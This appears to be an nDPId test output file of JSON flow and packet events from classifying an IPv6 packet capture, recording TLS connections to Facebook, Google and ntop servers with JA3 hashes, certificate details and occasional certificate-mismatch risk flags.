00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1448269146912,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269146912,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z4wBuwtKuyrowZlAgBAA4dR2AAABAQgKEg1\/Sxvn+wE="}
00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269146905,"flow_last_seen":1448269146912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1448269146912,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269146905,"flow_last_seen":1448269146912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1448269146912,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
01392{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3547,"flow_tot_l4_payload_len":3771,"flow_avg_l4_payload_len":628,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","server_names":"*.ak.fbcdn.net,s-static.ak.fbcdn.net,igsonar.com,*.igsonar.com,ak.facebook.com,*.ak.facebook.com,*.s-static.ak.facebook.com,connect.facebook.net,s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.ak.fbcdn.net","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"E7:62:76:74:8D:09:F7:E9:69:05:B8:1A:37:A1:30:2D:FF:3B:BC:0A"}}
00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":3080,"flow_avg_l4_payload_len":513,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
01392{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":3771,"flow_avg_l4_payload_len":471,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","server_names":"*.ak.fbcdn.net,s-static.ak.fbcdn.net,igsonar.com,*.igsonar.com,ak.facebook.com,*.ak.facebook.com,*.s-static.ak.facebook.com,connect.facebook.net,s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.ak.fbcdn.net","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"E7:62:76:74:8D:09:F7:E9:69:05:B8:1A:37:A1:30:2D:FF:3B:BC:0A"}}
00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1448269146905,"flow_last_seen":1448269146970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":4139,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1448269146905,"flow_last_seen":1448269146966,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3547,"flow_tot_l4_payload_len":4139,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00673{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1448269127395,"flow_last_seen":1448269127510,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":506,"flow_tot_l4_payload_len":1009,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00617{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1448269127395,"flow_last_seen":1448269127510,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":506,"flow_tot_l4_payload_len":1009,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1448269127400,"flow_last_seen":1448269138520,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":12133,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":45931,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269139314,"flow_last_seen":1448269139321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00607{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269139314,"flow_last_seen":1448269139321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269127922,"flow_last_seen":1448269127940,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00610{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269127922,"flow_last_seen":1448269127940,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1448269138575,"flow_last_seen":1448269138746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":282,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1448269138575,"flow_last_seen":1448269138746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2668,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1448269139219,"flow_last_seen":1448269139339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":298,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
00843{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1448269144450,"flow_last_seen":1448269144884,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":13365,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269123954,"flow_last_seen":1448269123971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00610{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269123954,"flow_last_seen":1448269123971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269143410,"flow_last_seen":1448269143539,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:2880:1010:3f20:face:b00c::25de","src_port":40308,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00622{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269143410,"flow_last_seen":1448269143539,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:2880:1010:3f20:face:b00c::25de","src_port":40308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269139314,"flow_last_seen":1448269139321,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00607{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269139314,"flow_last_seen":1448269139321,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269127922,"flow_last_seen":1448269127940,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00610{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269127922,"flow_last_seen":1448269127940,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1448269138575,"flow_last_seen":1448269138746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":282,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1448269138575,"flow_last_seen":1448269138746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2668,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1448269139219,"flow_last_seen":1448269139339,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":298,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
00843{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1448269144450,"flow_last_seen":1448269144884,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":13365,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269123954,"flow_last_seen":1448269123971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00610{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269123954,"flow_last_seen":1448269123971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269143410,"flow_last_seen":1448269143539,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:2880:1010:3f20:face:b00c::25de","src_port":40308,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00622{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269143410,"flow_last_seen":1448269143539,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:2880:1010:3f20:face:b00c::25de","src_port":40308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
